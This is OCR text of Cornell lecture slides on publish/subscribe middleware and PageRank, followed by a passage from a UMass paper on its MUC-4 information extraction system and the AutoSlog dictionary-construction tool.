topic $T$ translates to broadcasting event among members of $T$ - Programming abstraction which maps individual topics to distinct communication channels (many-to-many relationship) Topic-Based Publish/Subscribe - Hierarchy - A subscription made to some node in the hierarchy implicitly involves subscriptions to all the subtopics of that node - Wildcards - Offer the possibility to publish and subscribe to several topics that match a given set of keywords at the same time - E.g. an entire subtree or specific level of hierarchy Topic-Based Example ```java public class StockQuote implements Serializable { public String id, company, trader; public float price; public int amount; } public class StockQuoteSubscriber implements Subscriber { public void notify(Object o) { if (((StockQuote)o).company == 'TELCO' && ((StockQuote)o).price < 100) { buy(); } } } // ... Topic quotes = EventService.connect("/LondonStockMarket/Stock/StockQuotes"); Subscriber sub = new StockQuoteSubscriber(); quotes.subscribe(sub); ``` Content-Based Publish/Subscribe - Subscriptions are related to specific information content - More flexible than Topic-Based - Consumers subscribe to selective events by specifying filters to define constraints - Filters: name-value pairs, or comparison operators - (=, <, ≤, >, ≥) - Logically combined to form complex subscription patterns - Each combination of information items can be seen as a single dynamic logical channel (more of a many-to-one relationship) Content-Based: Subscription Patterns - Strings - Most frequently used - Must conform to the subscription grammar - SQL, XPath, or some proprietary language -Parsed by the engine - Template object - A participant provides an object $t$, which means they are interested in every event that conforms to type $t$ and whose attributes all match the attributes of $t$. - Executable code - Subscribers provide a predicate object able to filter events at runtime. - Implementation left to developer, hard to optimize Content-Based Example ```java public class StockQuote implements Serializable { public String id, company, trader; public float price; public int amount; } public class StockQuoteSubscriber implements Subscriber { public void notify(Object o) { buy(); // company == ‘TELCO’ and price < 100 } } // ... String criteria = (“company == ‘TELCO’ and price < 100”); Subscriber sub = new StockQuoteSubscriber(); EventService.subscribe(sub, criteria); ``` Spring 2013 cs 5301 Type-Based Publish/Subscribe - Events are filtered by their type - Example: Stock events can be split into two distinct types: stock quotes and stock requests - Reuses type scheme of object-oriented languages, provides seamless integration between middleware and programming language - Aims at providing guarantees such as type safety and encapsulation Type-Based Example ```java class LondonStockMarket implements Serializable { public String getId() {...} } class Stock extends LondonStockMarket { public String getCompany() {...} public String getTrader() {...} public int getAmount() {...} } class StockQuote extends Stock { public float getPrice() {...} } class StockRequest extends Stock { public float getMinPrice() {...} public float getMaxPrice() {...} } class StockSubscriber implements Subscriber<StockQuote> { public void notify(StockQuote s) { if (s.getCompany() == 'TELCO' && s.getPrice() < 100) buy(); } } // ... Subscriber<StockQuote> sub = new StockSubscriber(); EventService.subscribe<StockQuote>(sub); ``` Type-Based Example Advantages - Efficient implementations since message classification is static - Routing is simple - Notifications that don’t match any subscription aren’t sent to clients - Enables subscribers to describe runtime properties of objects they want - Simplicity and flexibility of decentralization implementation (large # of clients and data transfers) - Scalability by the use of content filtering Disadvantages - Limited expressiveness - Inefficient use of bandwidth if subscriber is only interested in specific criteria - More expressive, but higher runtime overhead - Complex protocols/implementations to determine the subscriber - Many events need to be pruned for performance reasons Outline • Introduction to Publish/Subscribe Paradigm • Common Denominators of Pub/Sub Schemes • How Pub/Sub compares to “Traditional” Interaction Schemes • Variants of Pub/Sub Schemes • Design and Implementation Implementing Topic-Based Pub/Sub • Using a centralized server (but can be replicated/clumpeded) – Requires an efficient mechanism for matching events to subscriptions (this problem resembles documents search and similar techniques can be used for both problems) – Main drawback: • Servers can become a bottleneck • Large fan-out of the event dissemination task, even when applying load balancing across multiple servers Fan-Out Problem Using Brokers Events • Event Forms: – Messages – lower level • Header (message identifier, issuer, priority, expiration time, etc.) and payload data – Invocations - higher level • Directed to a specific type of object and has well defined semantics • Additional logic to transform low-level messages into invocations to methods of the subscribers Architecture (a) Multicasting Services (b) Broker-level Notification (c) Peer-to-Peer overlay network Topic Based Publish/Subscribe - Option 1: Use a group communication toolkit and define a group for each topic - There may be scalability problems if the number of clients is very large, or the number of topics is very large - Does not support well multiple topics and range subscriptions - Option 2: use a fixed overlay of brokers, in which brokers tell their neighbors to which topics they have subscribers - Similar to IP multicast - For efficiency, use Bloom filters - Yet, another option is to employ a set of brokers that form a self-organized overlay (P2P) P2P Implementation of Pub/Sub - For each topic, build a dissemination tree among the brokers that have active subscribers - All events will be flooded along the tree arcs - In this case, a broker that receives a new subscription should join as a leaf - A broker that no longer has active subscriptions, should leave the tree P2P Implementation of Pub/Sub - Questions: - How to build this tree dynamically? - We would like to load balance the job of being the root for different topics (trees) - We would like to ensure that most brokers that have no active subscribers for a given topic will not be included in the tree - Possible solution: - Utilize a DHT Self-Organization of Brokers for Publish/Subscribe - Subscribing protocol - A subscriber contacts its nearest broker and passes the subscription to the broker - A broker $b$ that receives a subscription: - Creates an entry (e.g., in a hash table) with a back link to the node (broker or client) that sent it the subscription - Uses a hash of the subscription tag to ask the DHT for the next node $n$ to route to - If $n \neq b$, then $b$ forwards the subscription message to the next node $n$ - Unsubscribing protocol - The opposite Publishing Protocol - A publisher contacts its nearest broker and passes to it the tagged event in an UP message - A broker $b$ that receives a tagged event in an UP message, asks the DHT for the next node $n$ to route to - If $n \neq b$, then $b$ forwards the UP message to the next node $n$ - Otherwise, $b$ sends the tagged event in a DOWN message on every back link that corresponds to a subscription it knows about that matches the event’s topic Publishing Protocol - A broker $b$ that receives a tagged event in a DOWN message - Sends the tagged event in a DOWN message on every back link that corresponds to a subscription that matches the event’s topic - When a subscriber gets a tagged event that matches any of its subscriptions, it passes the tagged event to the application Qualities of Service - Persistence - Priorities - Transactions - Reliability Information-driven Applications - Communication is indirect and initiated by publishers of information - News delivery - Stock quoting - Air traffic control - E-commerce - Social networking - Anomaly detection - Electronic mailing lists or bulletin boards - Chat room instant message services Advantages/Disadvantages of Pub/Sub • Advantages – Scalability – Loosely coupled • Disadvantages – Loosely decoupled References • The Many Faces of Publish/Subscribe • Publish/Subscribe Communication Systems: from Models to Application • Survey of Publish Subscribe Communication System http://medianet.kent.edu/surveys/IAD04F-pubsubnet-shennaaz/Survey2.html PAGE RANK The search engine spider crawls the web by following hyperlinks on Web pages and compiles a list of pages to be stored in the search engine index. The search engine's index contains detailed data about each Web page, and what links are associated with each page. When a user performs a search through the search engine, a sophisticated algorithm is applied to the index, which returns all occurrences of the query in reverse order from most to least relevant. The Internet is made up of trillion(s) of Web pages that have billions of links between them. Are all Pages Equally Important? If a tree falls in the forest, and nobody blogs about it... does it make a difference? Spring 2013 PageRank Link Structure of the Web • The number of links is about 10 times the number of pages Backlinks and Forward links: - A and B are C’s backlinks - C is A and B’s forward link Intuitively, a webpage is important if it has a lot of backlinks What if a webpage has only one link off www.yahoo.com? A Simple Version of PageRank \[ R(u) = c \sum_{v \in B_u} \frac{R(v)}{N_v} \] • u: a web page • B_u: the set of u’s backlinks • N_v: the number of forward links of page v • c: the normalization factor to make \[ \| R \|_1 = 1 \] (\[ \| R \|_1 = | R_1 + ... + R_n | \]) An example of Simplified PageRank PageRank Calculation: first iteration \[ \begin{bmatrix} 1/3 \\ 1/2 \\ 1/6 \end{bmatrix} = \begin{bmatrix} 1/2 & 1/2 & 0 \\ 1/2 & 0 & 1 \\ 0 & 1/2 & 0 \end{bmatrix} \begin{bmatrix} yahoo \\ Amazon \\ Microsoft \end{bmatrix} = \begin{bmatrix} 1/3 \\ 1/3 \\ 1/3 \end{bmatrix} \] PageRank Calculation: second iteration \[ \begin{bmatrix} 5/12 \\ 1/3 \\ 1/4 \end{bmatrix} = \begin{bmatrix} 1/2 & 1/2 & 0 \\ 1/2 & 0 & 1 \\ 0 & 1/2 & 0 \end{bmatrix} \begin{bmatrix} yahoo \\ Amazon \\ Microsoft \end{bmatrix} = \begin{bmatrix} 1/3 \\ 1/3 \\ 1/3 \end{bmatrix} \] An Example of Simplified PageRank Convergence after some iterations A Problem with Simplified PageRank A loop: During each iteration, the loop accumulates rank but never distributes rank to other pages! An example of the Problem \[ \begin{bmatrix} 1/3 \\ 1/6 \\ 1/2 \end{bmatrix} = \begin{bmatrix} 1/2 & 1/2 & 0 \\ 1/2 & 0 & 0 \\ 0 & 1/2 & 1 \end{bmatrix} \begin{bmatrix} 1/3 \\ 1/3 \\ 1/3 \end{bmatrix} \] Spring 2013 cs 5301 102 An example of the Problem \[ \begin{bmatrix} 1/4 \\ 1/6 \\ 7/12 \end{bmatrix} = \begin{bmatrix} 1/2 & 1/2 & 0 \\ 1/2 & 0 & 0 \\ 0 & 1/2 & 1 \end{bmatrix} \begin{bmatrix} 1/3 \\ 1/6 \\ 1/2 \end{bmatrix} \] Spring 2013 cs 5301 103 Random Walks in Graphs • The Random Surfer Model – The standing probability distribution of a random walk on the graph of the web (simply keeps clicking successive links at random) • The Modified Model – The “random surfer” simply keeps clicking successive links at random, but periodically “gets bored” and jumps to a random page based on the distribution of E Modified Version of PageRank \[ R'(u) = c_1 \sum_{v \in B_u} \frac{R'(v)}{N_v} + c_2 E(u) \] E(u): a distribution of ranks of web pages that “users” jump to when they “gets bored” after successive links at random. An Example of Modified PageRank \[ M = \begin{bmatrix} 0.5 & 0.5 & 0 \\ 0.5 & 0 & 0 \\ 0 & 0.5 & 0.5 \\ \end{bmatrix} \] \[ \begin{bmatrix} \text{yahoo} \\ \text{Amazon} \\ \text{Microsoft} \\ \end{bmatrix} = \begin{bmatrix} 1/3 \\ 1/3 \\ 1/3 \\ \end{bmatrix} \] \(c_1 = 0.8 \quad c_2 = 0.2\) Pages with no Outgoing Links • How should we do with pages with no outgoing links? – A self-link – Consider then as if they have a link to every page on the graph • Which approach is better? Convergence Property • The Web is an expander-like graph – Theory of random walk: a random walk on a graph is said to be rapidly-mixing if it quickly converges to a limiting distribution on the set of nodes in the graph. A random walk is rapidly-mixing on a graph if and only if the graph is an expander graph – Expander graph: every subset of nodes S has a neighborhood (set of vertices accessible via outedges emanating from nodes in S) that is larger than some factor \( \alpha \) times of \(|S|\). A graph has a good expansion factor if and only if the largest eigenvalue is sufficiently larger than the second-largest eigenvalue. Big Data and How it Changes the World How will Large Scale Information Systems Change our World? - More privacy or less privacy? - Greater influence of individuals and small groups or greater influence to rich, strong companies? - How will the collecting of data change the way people view the world? Which Grain of Sand Makes a Heap? - Which bit turns data into Big Data? - Which piece of information transforms data into knowledge?
{"Source-Url": "http://courses2.cit.cornell.edu/cs5301/lect10.pdf", "len_cl100k_base": 6960, "olmocr-version": "0.1.48", "pdf-total-pages": 56, "total-fallback-pages": 0, "total-input-tokens": 96074, "total-output-tokens": 9375, "length": "2e12", "weborganizer": {"__label__adult": 0.0003097057342529297, "__label__art_design": 0.0003402233123779297, "__label__crime_law": 0.0003247261047363281, "__label__education_jobs": 0.0028820037841796875, "__label__entertainment": 7.396936416625977e-05, "__label__fashion_beauty": 0.0001264810562133789, "__label__finance_business": 0.00028061866760253906, "__label__food_dining": 0.00030112266540527344, "__label__games": 0.0004336833953857422, "__label__hardware": 0.0010423660278320312, "__label__health": 0.0003910064697265625, "__label__history": 0.0002980232238769531, "__label__home_hobbies": 9.703636169433594e-05, "__label__industrial": 0.0004067420959472656, "__label__literature": 0.0004055500030517578, "__label__politics": 0.00021004676818847656, "__label__religion": 0.0004448890686035156, "__label__science_tech": 0.037506103515625, "__label__social_life": 0.00015294551849365234, "__label__software": 0.0122222900390625, "__label__software_dev": 0.94091796875, "__label__sports_fitness": 0.00018393993377685547, "__label__transportation": 0.0005536079406738281, "__label__travel": 0.00017154216766357422}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 29432, 0.0218]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 29432, 0.36958]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 29432, 0.81114]], "google_gemma-3-12b-it_contains_pii": [[0, 106, false], [106, 980, null], [980, 1245, null], [1245, 1358, null], [1358, 1822, null], [1822, 2334, null], [2334, 3087, null], [3087, 3934, null], [3934, 4584, null], [4584, 5126, null], [5126, 5483, null], [5483, 5825, null], [5825, 6519, null], [6519, 7352, null], [7352, 7607, null], [7607, 8333, null], [8333, 8840, null], [8840, 9528, null], [9528, 10329, null], [10329, 10565, null], [10565, 11153, null], [11153, 11491, null], [11491, 11874, null], [11874, 12313, null], [12313, 12554, null], [12554, 12947, null], [12947, 13355, null], [13355, 13805, null], [13805, 14121, null], [14121, 14387, null], [14387, 15336, null], [15336, 15975, null], [15975, 16334, null], [16334, 17350, null], [17350, 18378, null], [18378, 19438, null], [19438, 20145, null], [20145, 20792, null], [20792, 20823, null], [20823, 21281, null], [21281, 22186, null], [22186, 23082, null], [23082, 23877, null], [23877, 24250, null], [24250, 24728, null], [24728, 25296, null], [25296, 25440, null], [25440, 26009, null], [26009, 26603, null], [26603, 26810, null], [26810, 27276, null], [27276, 27644, null], [27644, 28157, null], [28157, 28996, null], [28996, 29299, null], [29299, 29432, null]], "google_gemma-3-12b-it_is_public_document": [[0, 106, true], [106, 980, null], [980, 1245, null], [1245, 1358, null], [1358, 1822, null], [1822, 2334, null], [2334, 3087, null], [3087, 3934, null], [3934, 4584, null], [4584, 5126, null], [5126, 5483, null], [5483, 5825, null], [5825, 6519, null], [6519, 7352, null], [7352, 7607, null], [7607, 8333, null], [8333, 8840, null], [8840, 9528, null], [9528, 10329, null], [10329, 10565, null], [10565, 11153, null], [11153, 11491, null], [11491, 11874, null], [11874, 12313, null], [12313, 12554, null], [12554, 12947, null], [12947, 13355, null], [13355, 13805, null], [13805, 14121, null], [14121, 14387, null], [14387, 15336, null], [15336, 15975, null], [15975, 16334, null], [16334, 17350, null], [17350, 18378, null], [18378, 19438, null], [19438, 20145, null], [20145, 20792, null], [20792, 20823, null], [20823, 21281, null], [21281, 22186, null], [22186, 23082, null], [23082, 23877, null], [23877, 24250, null], [24250, 24728, null], [24728, 25296, null], [25296, 25440, null], [25440, 26009, null], [26009, 26603, null], [26603, 26810, null], [26810, 27276, null], [27276, 27644, null], [27644, 28157, null], [28157, 28996, null], [28996, 29299, null], [29299, 29432, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, true], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 29432, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 29432, null]], "pdf_page_numbers": [[0, 106, 1], [106, 980, 2], [980, 1245, 3], [1245, 1358, 4], [1358, 1822, 5], [1822, 2334, 6], [2334, 3087, 7], [3087, 3934, 8], [3934, 4584, 9], [4584, 5126, 10], [5126, 5483, 11], [5483, 5825, 12], [5825, 6519, 13], [6519, 7352, 14], [7352, 7607, 15], [7607, 8333, 16], [8333, 8840, 17], [8840, 9528, 18], [9528, 10329, 19], [10329, 10565, 20], [10565, 11153, 21], [11153, 11491, 22], [11491, 11874, 23], [11874, 12313, 24], [12313, 12554, 25], [12554, 12947, 26], [12947, 13355, 27], [13355, 13805, 28], [13805, 14121, 29], [14121, 14387, 30], [14387, 15336, 31], [15336, 15975, 32], [15975, 16334, 33], [16334, 17350, 34], [17350, 18378, 35], [18378, 19438, 36], [19438, 20145, 37], [20145, 20792, 38], [20792, 20823, 39], [20823, 21281, 40], [21281, 22186, 41], [22186, 23082, 42], [23082, 23877, 43], [23877, 24250, 44], [24250, 24728, 45], [24728, 25296, 46], [25296, 25440, 47], [25440, 26009, 48], [26009, 26603, 49], [26603, 26810, 50], [26810, 27276, 51], [27276, 27644, 52], [27644, 28157, 53], [28157, 28996, 54], [28996, 29299, 55], [29299, 29432, 56]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 29432, 0.01275]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
fa0d3219c40331bcc8a8985df9296ed78b04fd5f
INTRODUCTION The UMass/MUC-4 system is based on a form of sentence analysis known as selective concept extraction. This approach to language processing is distinguished by a minimal reliance on syntactic sentence analysis, along with a minimal dictionary customized to operate in a limited domain. Last year, the UMass/MUC-3 system demonstrated the viability of selective concept extraction, but serious questions were raised about the portability and scalability of the technology, particularly with respect to the creation of domain-dependent and task-dependent dictionaries. We estimated that 9 person/months went into the creation of the dictionary used by UMass/MUC-3, and we were unable to say how much domain-dependent lexicon was still missing. We were nevertheless sure that our dictionary coverage was incomplete. This year we confronted the issue of efficient system development, with particular attention to the problem of dictionary construction. As a result, we are now in a position to claim that effective customized dictionaries can be constructed quickly and easily by relatively inexperienced system developers. The dictionary used by UMass/MUC-3 emerged after roughly 1500 hours of highly skilled labor by two advanced graduate students and one post doc. For MUC-4, we created a new dictionary that achieved nearly the full functionality of the UMass/MUC-3 dictionary after only 8 hours of effort on the part of a first-year graduate student. This outcome was achieved through the use of an automated dictionary construction tool called AutoSlog. The AutoSlog dictionary was used for our optional TST3 and TST4 runs, while a modified version of our UMass/MUC-3 dictionary was used for our official TST3 and TST4 runs. Our optional and official systems were identically configured except for their dictionaries. Our official UMass/MUC-4 system employs a new memory-based consolidation module for discourse analysis, some generic enhancements to the CIRCUS sentence analyzer, and filters that operate after sentence analysis and then again after consolidation in order to reduce spurious slot fills and spurious templates. We also made a number of adjustments associated with MUC-4 template updates and domain specifications. We found it necessary to eliminate last year's optional case-based consolidation module because of its strong tendency toward overgeneration. Even so, we had two competing consolidation modules to evaluate, as well as a variety of possible filters. To resolve all of these other system options, we ran hundreds of tests over TST1, TST2 and 250 additional texts from the development corpus. OFFICIAL TESTING AND RESULTS We ran four test sets for MUC-4. Our official system was run on TST3 and TST4 as required, and we ran one additional optional system on TST3 and TST4. The official system and optional system were identical except for their dictionaries. The optional system ran a dictionary constructed by AutoSlog that contained 379 concept node definitions. Our official system ran with a version of the UMass/MUC-3 dictionary augmented by 76 additional concept node definitions imported from the AutoSlog dictionary (for a total of 389 concept node definitions). Both dictionaries accessed the same 5436 lexical definitions for part-of-speech recognition (these definitions were taken from the UMass/MUC-3 dictionary), along with 2102 proper names. We predicted that both systems would produce comparable levels of precision, and that the optional system would fall behind the official system by 10 recall points under All Templates. Table 1 contains the All Templates scores for all four test runs. Our official and optional systems both crashed twice on TST3, once on a relevant text containing three key templates and once again on an irrelevant text. No system crashes occurred during TST4. We note that the official system was run on all of DEV, TST1, and TST2 without any fatal errors shortly before the official testing began. ### University of Massachusetts: MUC-4 Test Results and Analysis **1. REPORT DATE** 1992 **2. REPORT TYPE** **3. DATES COVERED** 00-00-1992 to 00-00-1992 **4. TITLE AND SUBTITLE** **5a. CONTRACT NUMBER** **5b. GRANT NUMBER** **5c. PROGRAM ELEMENT NUMBER** **5d. PROJECT NUMBER** **5e. TASK NUMBER** **5f. WORK UNIT NUMBER** **6. AUTHOR(S)** **7. PERFORMING ORGANIZATION NAME(S) AND ADDRESS(ES)** University of Massachusetts, Center for Intelligent Information Retrieval, Department of Computer Science, Amherst, MA, 01003 **8. PERFORMING ORGANIZATION REPORT NUMBER** **9. SPONSORING/MONITORING AGENCY NAME(S) AND ADDRESS(ES)** **10. SPONSOR/MONITOR’S ACRONYM(S)** **11. SPONSOR/MONITOR’S REPORT NUMBER(S)** **12. DISTRIBUTION/AVAILABILITY STATEMENT** Approved for public release; distribution unlimited **13. SUPPLEMENTARY NOTES** **14. ABSTRACT** **15. SUBJECT TERMS** **16. SECURITY CLASSIFICATION OF:** <table> <thead> <tr> <th>a. REPORT</th> <th>b. ABSTRACT</th> <th>c. THIS PAGE</th> </tr> </thead> <tbody> <tr> <td>unclosed</td> <td>unclosed</td> <td>unclosed</td> </tr> </tbody> </table> **17. LIMITATION OF ABSTRACT** **18. NUMBER OF PAGES** 8 **19a. NAME OF RESPONSIBLE PERSON** *Standard Form 298 (Rev. 8-98)* Prescribed by ANSI Std Z39-18 As predicted, the AutoSlog dictionary produced lower recall levels than the official system: 7 points lower for TST3, and 12 points lower for TST4. Precision was comparable for both systems with AutoSlog generating higher overall precision rates: 2 points higher for TST3 and 1 point higher for TST4. We note that our performance on TST4 was generally worse than TST3. However, a close inspection of the detailed score reports for the official system shows that the primary difference in those reports lies in the All Templates precision scores: 57 for TST3 vs. 45 for TST4. This loss of precision can be explained for the most part by comparing the number of spurious templates: 16 for TST3 vs. 31 for TST4. <table> <thead> <tr> <th>System</th> <th>recall</th> <th>precision</th> <th>P&amp;R</th> <th>2P&amp;R</th> <th>P&amp;2R</th> </tr> </thead> <tbody> <tr> <td>Official TST3</td> <td>47</td> <td>57</td> <td>51.52</td> <td>54.67</td> <td>48.71</td> </tr> <tr> <td>Optional TST3</td> <td>40</td> <td>59</td> <td>47.67</td> <td>53.88</td> <td>42.75</td> </tr> <tr> <td>Official TST4</td> <td>48</td> <td>45</td> <td>46.45</td> <td>45.57</td> <td>47.37</td> </tr> <tr> <td>Optional TST4</td> <td>36</td> <td>46</td> <td>40.39</td> <td>43.58</td> <td>37.64</td> </tr> </tbody> </table> Table 1: Overall Scores under All Templates for the Four UMass/MUC-4 Test Runs Setting aside the differences between TST3 and TST4, we were pleased to see how well the AutoSlog dictionary performed relative to our hand-crafted dictionary from last year. Comparing P&R scores, our AutoSlog dictionary achieved 93% of the overall performance of our official system on TST3, and 87% of the official system's performance on TST4. In an effort to leverage the UMass/MUC-3 and the AutoSlog dictionaries, we strengthened the performance of the MUC-3 dictionary by augmenting it with 76 AutoSlog definitions. Without this boost to the MUC-3 dictionary, the distance between our official and optional systems would have been insignificant. Given our MUC-4 test results, we have demonstrated that an effective domain-dependent dictionary can be efficiently constructed using a representative text corpus accompanied by hand-coded template encodings. Our preliminary and very limited efforts have produced a dictionary that closely mirrors the functionality obtained by a relatively successful hand-crafted dictionary. Although the process of dictionary construction via AutoSlog is not totally automated, the manual labor needed can be completed in a matter of hours by a single individual with minimal expertise in dictionary construction. We consider this to be a significant step forward in the area of automated dictionary construction for text extraction applications. AUTOMATED DICTIONARY CONSTRUCTION The AutoSlog construction tool analyzes available key templates in conjunction with source texts and generates hypothesized CIRCUS definitions without human assistance. AutoSlog's proposed concept node definitions are derived from sentences in the MUC-4 development corpus that contain string fills associated with key templates. Using the complete 1300-text DEV corpus as the training set for our dictionary construction experiment, AutoSlog proposed 1356 concept node definitions in response to 1272 string-fill slots. Although a large number of these definitions were flawed or redundant, 28% of AutoSlog's proposed definitions were reasonable and could be included in an operational dictionary without alteration. In our experiment, 375 of the 1356 definitions proposed by AutoSlog were deemed acceptable when reviewed by visual inspection. Each AutoSlog definition begins with a single string fill in a single key template. Given a specific slot, AutoSlog extracts the first non-empty string fill listed in the key template (string-fill slots often contain multiple strings based on multiple references within the source text). It then searches the source text for the first instance of that exact string within the source text. Once located, AutoSlog pulls the complete sentence containing that string from the source text and passes it to the CIRCUS sentence analyzer for syntactic analysis. CIRCUS analyzes the sentence using a part-of-speech dictionary. When all goes well, a set of buffers are instantiated with simple syntactic constituents corresponding to a subject, a verb, and possibly an object or a prepositional phrase. When the original string fill shows up in one of these buffers, AutoSlog hypothesizes a concept node definition complete with a lexical trigger, complement pattern, and slot constraints. This definition is then written to a file and AutoSlog returns to the key template for the next string fill slot. Figure 1 shows the AutoSlog construction tool in action. 1 Other methods of leveraging the two dictionaries were tested, but this was the most effective strategy. The presence of string-fills in key templates is a crucial requirement for AutoSlog. In fact, the more string-fill slots, the better. The MUC-4 templates contained six string-fill slots used by AutoSlog: inc-instr-id, perp-ind-id, perp-org-id, phys-tgt-id, hum-tgt-name, and hum-tgt-desc. After processing the 1300 texts of DEV, AutoSlog generated 136 definitions based on inc-instr-id, 316 definitions from perp-ind-id, 201 definitions from perp-org-id, 306 definitions from phys-tgt-id, 193 definitions from hum-tgt-name, and 204 definitions from hum-tgt-desc. This dictionary was compiled in 14 hours and then passed to a CIRCUS programmer for manual review. During the review process, each definition was dispatched into one of two possible states: (1) keep as is, or (2) save for possible revision. Files were maintained for the "keeps" and the "edits" with the expectation that the keep-definitions might be augmented by some number of edit-definitions if any of the edit definitions could be salvaged. The initial categorization into "keeps" and "edits" was relatively fast because each definition could be categorized on the basis of visual inspection alone. Many definitions destined for the edit files were easy to spot since they often resulted from parsing errors, patterns of no linguistic generality, or patterns of dubious reliability. Here is an example a good AutoSlog definition generated by the first text in the development corpus: ``` Id: DEV-MUC3-0001 Trigger: KIDNAPPED Trigger Root: KIDNAP Syntactic-type: VERB Slot filler: "TERRORISTS" Sentence: \(\text{THE ARCE BATTALION COMMAND HAS REPORTED THAT ABOUT 6650 PEASANTS OF VARIOUS AGES HAVE BEEN KIDNAPPED BY TERRORISTS OF THE FARABUNDO MARTI NATIONAL LIBERATION FRONT IN SAN MIGUEL DEPARTMENT}\) Name: %ACTOR-PASSIVE-VERB-PP-KIDNAPPED-BY% Time limit: 10 Variable Slots: \[(\text{ACTOR (*PP* IS-PREP? (BY))})\] Constraints: \((\text{CLASS ORGANIZATION *PP*})\) \((\text{CLASS TERRORIST *PP*})\) \((\text{CLASS PROPER-NAME *PP*})\) \((\text{CLASS HUMAN *PP*})\) Constant Slots: (TYPE PERPETRATOR) Enabling Conditions: ((PASSIVE)) ``` This definition extracts slot fillers from constructions of the form: "X is/was/(has/has been) kidnapped by Y." This particular definition will only pick up the conceptual actor Y. A separate definition is needed to pick up the conceptual victim X. The following is an example of a bad AutoSlog definition: ``` ((( ) ) ) (( ) ((( )))(( ))) ``` Figure 1: Automated Dictionary Construction As it stands, this definition hypothesizes that an active form of the verb "to be" predicts the victim of a kidnapping. Although the source sentence does legitimately suggest that the verb "to be" can be used to link human names with human descriptions, this proposed definition cannot be trusted to deliver a kidnapping victim. When AutoSlog creates a new definition, it checks the existing set of previously proposed definitions to see if the current proposal duplicates an older one. AutoSlog does not produce multiple copies of the same definition. By tracking the number of duplicates AutoSlog suppresses, we can see evidence that the dictionary is approaching a saturation point. In particular, we note that after AutoSlog has processed 1200 texts, the next 100 texts generate only half as many definitions as the first 100 texts. Figure 2 shows the weakening frequency of new dictionary definitions as we move through the development corpus. Although the AutoSlog dictionary definitions are derived from only six template slots, consolidation and template-generation routines are capable of extracting the information needed to fill additional slots. When the AutoSlog dictionary operates in conjunction with the full system, we can fill every template slot except phys-tgt-nation, phys-tgt-effect, phys-tgt-total-num, and hum-tgt-total-num. The 8-hour AutoSlog dictionary was completed only four weeks before the final testing for MUC-4. Now that we have seen how much impact AutoSlog can have on the process of dictionary construction, it makes sense to pursue enhancements to AutoSlog in order to strengthen its baseline performance. As it stands, AutoSlog can be moved to new domains with a minimal amount of software tuning. Adjustments must be made to handle a new template design, but any templates that contain string-fills will serve to fuel dictionary construction. Figure 2: Dictionary Saturation Under AutoSlog TST3 ERROR ANALYSIS We have conducted a post hoc analysis of our system's performance on TST3 in order to better understand the various problems encountered on TST3. Most of this data describes the behavior of CIRCUS, its use of concept node definitions, and the effects of memory-based consolidation. As detailed and useful as the score reports are, score reports are not designed to tease apart the performance contributions of a sentence analyzer, discourse analyzer, or template generator. Subcomponents like these must be analyzed separately if we want to understand where to focus future development efforts. Recall Limitations The dictionary used by the official UMass/MUC-4 system contained 389 concept node definitions. Of these, 172 (44%) were enabled2 to process TST3. On average, each definition was enabled nearly 9 times for a total of 1515 concept node enablements (~15 per text on average). For TST3, CIRCUS extracted 943 string fills to fill variable slots in enabled concept nodes. Because there are a lot of redundant concept node definitions, almost half of these string fills were duplicates, leaving 520 unique string fills extracted by CIRCUS. According to our analysis, 214 of these string fills were discarded during consolidation and 306 string fills made it into a response template. Of the 520 non-redundant string-fills, 38% were correctly incorporated into a response template where they matched the string or strings listed in a key template. A full 34% were correctly discarded or merged by consolidation (and therefore did not make it into a response template). The sum of these instances accounts for 72% of the total string fills - all handled correctly by consolidation. Of the remaining string fills, 21% appeared in response templates as spurious slot fills, and 7% were incorrectly discarded. Of the 237 string fills that did legitimately correspond to slot fills in key templates, consolidation correctly incorporated 199 (84%) into response templates. Even so, our overall recall score was only 46%. Where are the other string fills? Our analysis shows that CIRCUS generated 225 good (full match) string fills and 12 partially good (partial match) string fills. According to the score report, there were 416 possible string fills for TST3. That tells us CIRCUS is producing only 55% of the possible string fills for TST3. This 55% hit rate effectively imposes a rough ceiling on our overall recall, and suggests that significant gains in recall will require stronger performance levels during sentence analysis. PRECISION LIMITATIONS When we examine the 306 string fills present in our TST3 response templates, we find that 187 could be matched to slot fills in some key template and 12 could be partially matched to a key template slot fill. If all of these string fills were in correct slots and correct templates, our string fill precision would be 63%. But only 142 string fills result in full matches with key template slots and 24 result in partial matches. Of the 107 strings that can't be matched to any key template, we have found the following breakdown of errors: - 49 (46%) should have been discarded as irrelevant - 16 (15%) were from mis-fired concept node definitions - 15 (14%) were from parser errors - 14 (13%) should have been merged with a more specific string - 12 (11%) were from words not covered adequately by the dictionary - 1 (1%) was from a source string altered by preprocessing --- 2 An enabled concept node is one that produces a case frame instantiation. All output generated by CIRCUS is based on enabled concept nodes. of the 49 false hits associated with relevancy discriminations, our single greatest precision error came from 30 false hits on military clashes. After that, four general problem areas were about equally responsible for a significant number of errors: (1) false hits associated with faulty concept node definitions, (2) CIRCUS sentence analysis errors, (3) consolidation merging failures, and (4) inadequate dictionary coverage. Dictionary Coverage Although inadequate dictionary coverage was identified as a source of visible precision loss, we have been remarkably well-served by a relatively small dictionary of 5436 lexical items augmented by 2102 proper names. An analysis of the TST3 lexicon shows that 1008 words appearing in 